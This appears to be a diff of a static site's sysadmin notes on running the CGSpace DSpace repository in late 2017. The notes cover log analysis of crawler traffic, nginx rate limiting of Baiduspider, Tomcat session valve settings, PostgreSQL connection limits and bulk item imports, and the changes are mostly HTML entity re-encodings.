<pre tabindex="0"><code># grep 5.9.6.51 /var/log/nginx/access.log | tail -n 1
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &quot;GET /handle/10568/16515/recent-submissions HTTP/1.1&quot; 200 5097 &quot;-&quot; &quot;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&quot;
5.9.6.51 - - [12/Nov/2017:08:13:13 +0000] &#34;GET /handle/10568/16515/recent-submissions HTTP/1.1&#34; 200 5097 &#34;-&#34; &#34;Mozilla/5.0 (compatible; MegaIndex.ru/2.0; +http://megaindex.com/crawler)&#34;
</code></pre><ul>
<li>What&rsquo;s amazing is that it seems to reuse its Java session across all requests:</li>
</ul>
<pre tabindex="0"><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51' dspace.log.2017-11-12
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=5.9.6.51&#39; dspace.log.2017-11-12
1558
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 5.9.6.51 dspace.log.2017-11-12 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>Bravo to MegaIndex.ru!</li>
<li>The same cannot be said for 95.108.181.88, which appears to be YandexBot, even though Tomcat&rsquo;s Crawler Session Manager valve regex should match &lsquo;YandexBot&rsquo;:</li>
</ul>
<pre tabindex="0"><code># grep 95.108.181.88 /var/log/nginx/access.log | tail -n 1
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &quot;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&quot; 200 972019 &quot;-&quot; &quot;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&quot;
$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-12
95.108.181.88 - - [12/Nov/2017:08:33:17 +0000] &#34;GET /bitstream/handle/10568/57004/GenebankColombia_23Feb2015.pdf HTTP/1.1&#34; 200 972019 &#34;-&#34; &#34;Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)&#34;
$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88&#39; dspace.log.2017-11-12
991
</code></pre><ul>
<li>Move some items and collections on CGSpace for Peter Ballantyne, running <a href="https://gist.github.com/alanorth/e60b530ed4989df0c731afbb0c640515"><code>move_collections.sh</code></a> with the following configuration:</li>
@ -612,7 +612,7 @@ $ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=95.108.181.88' dspace.log.2017-11-
<li>The solution <a href="https://github.com/ilri/rmg-ansible-public/commit/f0646991772660c505bea9c5ac586490e7c86156">I came up with</a> uses tricks from both of those</li>
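<li>The gist is an nginx <code>map</code> that gives known-bad bots a non-empty key, which then feeds a <code>limit_req</code> zone (a rough sketch with illustrative names and rates, not the exact deployed config):</li>
</ul>
<pre tabindex="0"><code># requests with an empty key are never rate limited
map $http_user_agent $limit_bots {
    default &#39;&#39;;
    ~*baiduspider $http_user_agent;
}
limit_req_zone $limit_bots zone=bots:1m rate=1r/s;

# in the server block; nginx rejects excess requests with HTTP 503 by default
limit_req zone=bots burst=5;
</code></pre><ul>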
<li>I deployed the limit on CGSpace and DSpace Test and it seems to work well:</li>
</ul>
<pre tabindex="0"><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
<pre tabindex="0"><code>$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: gzip
@ -627,7 +627,7 @@ X-Cocoon-Version: 2.2.0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
$ http --print h https://cgspace.cgiar.org/handle/10568/1 User-Agent:&#39;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#39;
HTTP/1.1 503 Service Temporarily Unavailable
Connection: keep-alive
Content-Length: 206
@ -642,9 +642,9 @@ Server: nginx
<ul>
<li>At the end of the day I checked the logs and it really looks like the Baidu rate limiting is working, HTTP 200 vs 503:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 200 &quot;
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 200 &#34;
1132
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &quot;13/Nov/2017&quot; | grep &quot;Baiduspider&quot; | grep -c &quot; 503 &quot;
# zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#34;13/Nov/2017&#34; | grep &#34;Baiduspider&#34; | grep -c &#34; 503 &#34;
10105
</code></pre><ul>
<li>Helping Sisay proof 47 records for IITA: <a href="https://dspacetest.cgiar.org/handle/10568/97029">https://dspacetest.cgiar.org/handle/10568/97029</a></li>
@ -695,7 +695,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>After a few minutes the connections went down to 44 and CGSpace was kinda back up, it seems like Tsega restarted Tomcat</li>
<li>Looking at the REST and XMLUI log files, I don&rsquo;t see anything too crazy:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
13 66.249.66.223
14 207.46.13.36
17 207.46.13.137
@ -706,7 +706,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
1400 70.32.83.92
1503 50.116.102.77
6037 45.5.184.196
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;17/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;17/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
325 139.162.247.24
354 66.249.66.223
422 207.46.13.36
@ -737,7 +737,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
<li>Linode sent an alert that CGSpace was using a lot of CPU around 4 to 6 AM</li>
<li>Looking in the nginx access logs I see the most active XMLUI users between 4 and 6 AM:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;19/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;19/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
111 66.249.66.155
171 5.9.6.51
188 54.162.241.40
@ -751,7 +751,7 @@ dspace6=# CREATE EXTENSION pgcrypto;
</code></pre><ul>
<li>66.249.66.153 appears to be Googlebot:</li>
</ul>
<pre tabindex="0"><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &quot;GET /handle/10568/2203 HTTP/1.1&quot; 200 6309 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&quot;
<pre tabindex="0"><code>66.249.66.153 - - [19/Nov/2017:06:26:01 +0000] &#34;GET /handle/10568/2203 HTTP/1.1&#34; 200 6309 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)&#34;
</code></pre><ul>
<li>We know Googlebot is persistent but behaves well, so I guess it was just a coincidence that it came at a time when we had other traffic and server activity</li>
<li>In related news, I see an Atmire update process going for many hours and responsible for hundreds of thousands of log entries (two thirds of all log entries)</li>
@ -786,7 +786,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode sent an alert that the CPU usage on the CGSpace server was very high around 4 to 6 AM</li>
<li>The logs don&rsquo;t show anything particularly abnormal between those hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;22/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;22/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
136 31.6.77.23
174 68.180.229.254
217 66.249.66.91
@ -807,7 +807,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted again that CPU usage was high on CGSpace from 4:13 to 6:13 AM</li>
<li>I see a lot of Googlebot (66.249.66.90) in the XMLUI access logs</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
88 66.249.66.91
140 68.180.229.254
155 54.196.2.131
@ -821,7 +821,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
</code></pre><ul>
<li>&hellip; and the usual REST scrapers from CIAT (45.5.184.196) and CCAFS (70.32.83.92):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;23/Nov/2017:0[456]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;23/Nov/2017:0[456]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
5 190.120.6.219
6 104.198.9.108
14 104.196.152.243
@ -836,7 +836,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>These IPs crawling the REST API don&rsquo;t specify user agents and I&rsquo;d assume they are creating many Tomcat sessions</li>
<li>I would catch them in nginx to assign a &ldquo;bot&rdquo; user agent to them so that the Tomcat Crawler Session Manager valve could deal with them, but they don&rsquo;t seem to create any sessions really, at least not in the dspace.log:</li>
</ul>
<pre tabindex="0"><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 70.32.83.92 dspace.log.2017-11-23 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>I&rsquo;m wondering if REST works differently, or just doesn&rsquo;t log these sessions?</li>
@ -861,7 +861,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>In just a few seconds I already see a dozen requests from Googlebot (of course they get HTTP 301 redirects to cgspace.cgiar.org)</li>
<li>I also noticed that CGNET appears to be monitoring the old domain every few minutes:</li>
</ul>
<pre tabindex="0"><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &quot;HEAD / HTTP/1.1&quot; 301 0 &quot;-&quot; &quot;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&quot;
<pre tabindex="0"><code>192.156.137.184 - - [24/Nov/2017:20:33:58 +0000] &#34;HEAD / HTTP/1.1&#34; 301 0 &#34;-&#34; &#34;curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2&#34;
</code></pre><ul>
<li>I should probably tell CGIAR people to have CGNET stop that</li>
</ul>
@ -870,7 +870,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>Linode alerted that CGSpace server was using too much CPU from 5:18 to 7:18 AM</li>
<li>Yet another mystery because the load for all domains looks fine at that time:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;26/Nov/2017:0[567]&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;26/Nov/2017:0[567]&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 66.249.66.83
195 104.196.152.243
220 40.77.167.82
@ -887,7 +887,7 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>About an hour later Uptime Robot said that the server was down</li>
<li>Here are all the top XMLUI and REST users from today:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;29/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;29/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
540 66.249.66.83
659 40.77.167.36
663 157.55.39.214
@ -905,14 +905,14 @@ $ grep -c com.atmire.utils.UpdateSolrStatsMetadata dspace.log.2017-11-19
<li>I don&rsquo;t see much activity in the logs but there are 87 PostgreSQL connections</li>
<li>But shit, there were 10,000 unique Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2017-11-29 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-29 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
10037
</code></pre><ul>
<li>Although maybe that&rsquo;s not much, as the previous two days had more:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2017-11-27 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-27 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
12377
$ cat dspace.log.2017-11-28 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ cat dspace.log.2017-11-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
16984
</code></pre><ul>
<li>I think we just need to start increasing the number of allowed PostgreSQL connections instead of fighting this, as it&rsquo;s the most common source of crashes we have; that means raising the limit on both ends, roughly:</li>
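</ul>
<pre tabindex="0"><code># postgresql.conf (illustrative value, not what we deployed)
max_connections = 200

# dspace.cfg: DSpace&#39;s own connection pool (illustrative value)
db.maxconnections = 90
</code></pre>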

View File

@ -30,7 +30,7 @@ The logs say &ldquo;Timeout waiting for idle object&rdquo;
PostgreSQL activity says there are 115 connections currently
The list of connections to XMLUI and REST API for today:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -123,7 +123,7 @@ The list of connections to XMLUI and REST API for today:
<li>PostgreSQL activity says there are 115 connections currently</li>
<li>The list of connections to XMLUI and REST API for today:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
763 2.86.122.76
907 207.46.13.94
1018 157.55.39.206
@ -137,12 +137,12 @@ The list of connections to XMLUI and REST API for today:
</code></pre><ul>
<li>The number of DSpace sessions isn&rsquo;t even that high:</li>
</ul>
<pre tabindex="0"><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ cat /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
5815
</code></pre><ul>
<li>Connections in the last two hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017:(09|10)&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017:(09|10)&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
78 93.160.60.22
101 40.77.167.122
113 66.249.66.70
@ -157,18 +157,18 @@ The list of connections to XMLUI and REST API for today:
<li>What the fuck is going on?</li>
<li>I&rsquo;ve never seen this 2.86.122.76 before, it has made quite a few unique Tomcat sessions today:</li>
</ul>
<pre tabindex="0"><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 2.86.122.76 /home/cgspace.cgiar.org/log/dspace.log.2017-12-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
822
</code></pre><ul>
<li>Appears to be some new bot:</li>
</ul>
<pre tabindex="0"><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &quot;GET /handle/10568/78444?show=full HTTP/1.1&quot; 200 29307 &quot;-&quot; &quot;Mozilla/3.0 (compatible; Indy Library)&quot;
<pre tabindex="0"><code>2.86.122.76 - - [01/Dec/2017:09:02:53 +0000] &#34;GET /handle/10568/78444?show=full HTTP/1.1&#34; 200 29307 &#34;-&#34; &#34;Mozilla/3.0 (compatible; Indy Library)&#34;
</code></pre><ul>
<li>I restarted Tomcat and everything came back up</li>
<li>I can add Indy Library to the Tomcat crawler session manager valve but it would be nice if I could simply remap the useragent in nginx</li>
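<li>For reference, a sketch of that valve in Tomcat&rsquo;s <em>server.xml</em> (the regex here is illustrative):</li>
</ul>
<pre tabindex="0"><code>&lt;Valve className=&#34;org.apache.catalina.valves.CrawlerSessionManagerValve&#34;
       crawlerUserAgents=&#34;.*[bB]ot.*|.*Indy Library.*|.*Drupal.*&#34; /&gt;
</code></pre><ul>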
<li>I will also add &lsquo;Drupal&rsquo; to the Tomcat crawler session manager valve because there are Drupals out there harvesting and they should be considered as bots</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;1/Dec/2017&quot; | grep Drupal | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;1/Dec/2017&#34; | grep Drupal | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
3 54.75.205.145
6 70.32.83.92
14 2a01:7e00::f03c:91ff:fe18:7396
@ -206,7 +206,7 @@ The list of connections to XMLUI and REST API for today:
<li>I don&rsquo;t see any errors in the DSpace logs but I see in nginx&rsquo;s access.log that UptimeRobot was returned with HTTP 499 status (Client Closed Request)</li>
<li>Looking at the REST API logs I see some new client IP I haven&rsquo;t noticed before:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &quot;6/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#34;6/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
18 95.108.181.88
19 68.180.229.254
30 207.46.13.151
@ -228,7 +228,7 @@ The list of connections to XMLUI and REST API for today:
<li>I looked just now and see that there are 121 PostgreSQL connections!</li>
<li>The top users right now are:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;7/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;7/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
838 40.77.167.11
939 66.249.66.223
1149 66.249.66.206
@ -247,7 +247,7 @@ The list of connections to XMLUI and REST API for today:
</code></pre><ul>
<li>It is responsible for 4,500 Tomcat sessions today alone:</li>
</ul>
<pre tabindex="0"><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 124.17.34.60 /home/cgspace.cgiar.org/log/dspace.log.2017-12-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
4574
</code></pre><ul>
<li>I&rsquo;ve adjusted the nginx IP mapping that I set up last month to account for 124.17.34.60 and 124.17.34.59 using a regex, as it&rsquo;s the same bot on the same subnet</li>
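<li>Something like this sketch (the mapped value is hypothetical; the point is that both IPs resolve to one fake user agent):</li>
</ul>
<pre tabindex="0"><code>map $remote_addr $ua {
    # treat the whole bot subnet as a single agent
    ~^124\.17\.34\.(59|60)$    &#39;bot&#39;;
    default                    $http_user_agent;
}
</code></pre><ul>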
@ -255,8 +255,8 @@ The list of connections to XMLUI and REST API for today:
</ul>
<pre tabindex="0"><code>$ /home/cgspace.cgiar.org/bin/dspace cleanup -v
...
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(144666) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(144666) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is like I discovered in <a href="/cgspace-notes/2017-04">2017-04</a>, to set the <code>primary_bitstream_id</code> to null:</li>
</ul>
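<pre tabindex="0"><code>-- a sketch reconstructing that fix (bitstream id taken from the error above):
dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (144666);
</code></pre>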
@ -294,12 +294,12 @@ UPDATE 1
</li>
<li>I did a test import of the data locally after building with SAFBuilder but for some reason I had to specify the collection (even though the collections were specified in the <code>collection</code> field)</li>
</ul>
<pre tabindex="0"><code>$ JAVA_OPTS=&quot;-Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/89338 --source /Users/aorth/Downloads/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat --mapfile=/tmp/ccafs.map &amp;&gt; /tmp/ccafs.log
</code></pre><ul>
<li>It&rsquo;s the same on DSpace Test; I can&rsquo;t import the SAF bundle without specifying the collection:</li>
</ul>
<pre tabindex="0"><code>$ dspace import --add --eperson=aorth@mjanja.ch --mapfile=/tmp/ccafs.map --source=/tmp/ccafs-2016/SimpleArchiveFormat
No collections given. Assuming 'collections' file inside item directory
No collections given. Assuming &#39;collections&#39; file inside item directory
Adding items from directory: /tmp/ccafs-2016/SimpleArchiveFormat
Generating mapfile: /tmp/ccafs.map
Processing collections file: collections
@ -328,7 +328,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted that CGSpace was using high CPU from 4 to 6 PM</li>
<li>The logs for today show the CORE bot (137.108.70.7) being active in XMLUI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
671 66.249.66.70
885 95.108.181.88
904 157.55.39.96
@ -342,7 +342,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>And then some CIAT bot (45.5.184.196) is actively hitting API endpoints:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;17/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;17/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
33 68.180.229.254
48 157.55.39.96
51 157.55.39.179
@ -371,7 +371,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted this morning that there was high outbound traffic from 6 to 8 AM</li>
<li>The XMLUI logs show that the CORE bot from last night (137.108.70.7) is very active still:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
190 207.46.13.146
191 197.210.168.174
202 86.101.203.216
@ -385,7 +385,7 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
<li>On the API side (REST and OAI) there is still the same CIAT bot (45.5.184.196) from last night making quite a number of requests this morning:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
7 104.198.9.108
8 185.29.8.111
8 40.77.167.176
@ -402,7 +402,7 @@ Elapsed time: 2 secs (2559 msecs)
<li>Linode alerted that CGSpace was using 396.3% CPU from 12 to 2 PM</li>
<li>The REST and OAI API logs look pretty much the same as earlier this morning, but there&rsquo;s a new IP harvesting XMLUI:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;18/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;18/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
360 95.108.181.88
477 66.249.66.90
526 86.101.203.216
@ -420,13 +420,13 @@ Elapsed time: 2 secs (2559 msecs)
</code></pre><ul>
